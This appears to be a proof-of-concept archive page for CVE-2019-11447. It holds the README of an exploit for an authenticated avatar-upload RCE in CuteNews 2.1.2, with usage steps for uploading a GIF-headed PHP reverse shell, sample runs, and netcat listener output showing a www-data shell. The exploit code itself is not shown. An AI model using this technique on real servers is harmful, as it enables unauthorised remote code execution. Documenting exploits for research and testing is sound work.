Associated Vulnerability
Title:编号重复 (CVE-2019-11447)Description:An issue was discovered in CutePHP CuteNews 2.1.2. An attacker can infiltrate the server through the avatar upload process in the profile area via the avatar_file field to index.php?mod=main&opt=personal. There is no effective control of $imgsize in /core/modules/dashboard.php. The header content of a file can be changed and the control can be bypassed for code execution. (An attacker can use the GIF header for this.)
Description
Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)
Readme
# CVE-2019-11447 Exploit/PoC - CuteNews 2.1.2 Avatar upload RCE (Authenticated)
> Exploit Code for [CVE-2019-11447](https://nvd.nist.gov/vuln/detail/CVE-2019-11447) aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)
Exploit Links:
Expected outcome: Login/Register an account, craft user selected PHP file with .gif magic bytes, uploads the file as an avatar and trigger it to achieve Remote Code Execution.
Intended only for educational and testing in corporate environments.
This Exploit was tested on Python 3.8.6
### Usage
```shell
cfx: ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]
CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL CuteNews URL (Example: http://127.0.0.1)
-u USERNAME, --username USERNAME
Username to Login/Register
-p PASSWORD, --password PASSWORD
Password to Login/Register
-e EMAIL, --email EMAIL
Email to Login/Register
Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticon.net
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y
```
#### User Inputs :
This exploit expects four arguments to run initially :
- **-l** : CuteNews URL
- **-u** : Username required to Login/Register
- **-p** : Password required to Login/Register
- **-e** : Email required to Login/Register
Additional required user inputs:
- **Select your PHP file ->** Here the user has to specify the PHP file to be uploaded, it can be **any** PHP file Example: PHP info, PHP reverse shell. If the PHP file is located in the same directory as of the exploits then the user can just specify the file name:
Example: `[^] Select your PHP file -> rev.php`
Orelse, user need to specify the location of PHP file:
Example: `[^] Select your PHP file -> ~/Downloads/rev.php`
- **Press y/n to trigger reverse shell ->** Here if the user has uploaded an PHP reverse shell, he/she has the choice whether to trigger the reverse shell using y/n.
Either way the exploit is designed to print out the uploaded file location for further use.
#### Exploit Execution
- Scenario 1 > Login with existing credentials and getting a reverse shell:
```shell
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
```
#### Shell
```
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
```
- Scenario 2 > Registering new user and getting a reverse shell:
```shell
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticons.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
```
#### Shell
```
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
```
## Reference
- <https://nvd.nist.gov/vuln/detail/CVE-2019-11447>
File Snapshot
[4.0K] /data/pocs/fdc82d593fd79c5c036ee120438607388df29ca5
├── [6.5K] exploit.py
├── [4.7K] README.md
└── [5.4K] rev.php
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →